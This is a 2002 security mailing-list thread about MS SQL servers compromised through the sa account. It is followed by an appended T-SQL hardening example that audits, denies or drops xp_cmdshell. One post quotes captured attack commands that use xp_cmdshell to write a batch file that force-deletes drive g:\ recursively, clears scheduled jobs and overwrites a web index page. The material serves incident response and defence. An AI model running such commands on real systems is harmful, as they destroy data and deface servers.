Security Incidents mailing list archives
Re: Windows Systems Defaced
From: Alphonse MacDonald <amacdonald () islandpress org>
Date: 14 May 2002 20:44:18 -0000
In-Reply-To: <BKEPKKMHGCKPBIKCIBGNGEPJCAAA.zenone () cats ucsc edu>

Island Press was similarly defaced. It appears access occurred at 5:08 on May 8th and was achieved via the MS SQL server sa password. We did not have IIS running but had enough files removed to require a complete rebuild. We also believed all systems to have been properly patched. Were any of the other servers attacked behind a firewall or were they all visible?

Alphonse
From: "Steve Zenone" <zenone () cats ucsc edu>
To: <incidents () securityfocus com>
Cc: <thompson () isc upenn edu>
Subject: RE: Windows Systems Defaced
Date: Thu, 2 May 2002 20:23:56 -0700

Hello,

Stephen W. Thompson wrote:
|> Have any of you seen similar activity? Any thoughts?
|
|Yes, we had one that matches most of your details. These
|are exact matches:
|
|> [] Damage occurred around 1600 on 5/1/2002
|BUT=> (approx. 16:00 EDT for us)
|> [] Win-popup message with "F---ing University of Rochester"
|> -- NOTE: not all systems running IIS
|> [] Admins claimed that all systems were patched correctly
|> [] Most were running updated and current AV

Thank you very much for your reply - it definitely helps!

We have been seeing MS-SQL (1433/tcp) attacks that try and execute the following:

-----BEGIN SNIPPET-----
xp_cmdshell 'echo net send localhost F---ing University of Rochester rebooting... > rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
xp_cmdshell 'at /delete /y'
xp_cmdshell 'echo if exist \inetpub\wwwroot\ type %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> rochester.bat'
-----END SNIPPET-----

The above commands were directed to systems that were listening on port 1433/tcp and accessible from the outside. It appears that there were multiple source IPs involved in this attack.

At this time, I am not completely clear on how to protect from this attack. What I've researched is that since external functions such as xp_cmdshell, xp_startmail, xp_sendmail, and xp_stopmail present possible security risks, it is recommended to drop such external system functions. Else, deny EXECUTE permission on them to specific users/roles if dropping these procedures would break any of the SQL Server. I haven't tested this - but does anyone on this list know if this is a safe and effective solution?

Regards,
Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
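Steve asks whether dropping xp_cmdshell, or denying EXECUTE on it, is a safe and effective fix. The T-SQL below is an added example, not code from any poster in this thread: it audits who holds EXECUTE on xp_cmdshell on a SQL Server 2000 instance, applies both of the options he mentions, and records the caveat that matters for this incident, namely that the attacker authenticated as sa. The sysprotects codes are the SQL Server 2000 values; the sa password is a placeholder, and the final batch is for SQL Server 2005 and later only.

```sql
USE master
GO

-- Audit: which database users or roles hold an explicit EXECUTE grant or
-- deny on xp_cmdshell (SQL Server 2000 system tables: action 224 = EXECUTE,
-- protecttype 205 = GRANT, 206 = DENY). sa and other sysadmin members are
-- never listed here, because they can always run it.
SELECT u.name AS grantee,
       CASE p.protecttype WHEN 205 THEN 'GRANT' WHEN 206 THEN 'DENY' END AS permission
FROM sysprotects p
JOIN sysobjects o ON o.id = p.id
JOIN sysusers   u ON u.uid = p.uid
WHERE o.name = 'xp_cmdshell' AND p.action = 224
GO

-- Option from the post: keep the procedure but refuse EXECUTE to every
-- login that is not sysadmin. An application login with a real need can be
-- granted it back individually after review.
DENY EXECUTE ON xp_cmdshell TO public
GO

-- Other option from the post: remove the extended procedure entirely.
-- Confirm first that no job or application calls it.
EXEC sp_dropextendedproc 'xp_cmdshell'
GO

-- Caveat: the attack in this thread logged in as sa over 1433/tcp. sa is a
-- member of sysadmin, which bypasses DENY and can re-register a dropped
-- extended procedure, so neither control above closes that path. A strong
-- sa password and keeping 1433/tcp off the Internet do. (Placeholder value.)
EXEC sp_password NULL, 'PLACEHOLDER-long-unique-passphrase', 'sa'
GO

-- SQL Server 2005 and later only: xp_cmdshell is a surface-area option there
-- (off by default) and is controlled with sp_configure instead.
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE
GO
```

Run the audit query again after the DENY to confirm the new row for public, and check the SQL Server error log for failed and successful sa logins from unexpected sources, since the post reports multiple source IPs.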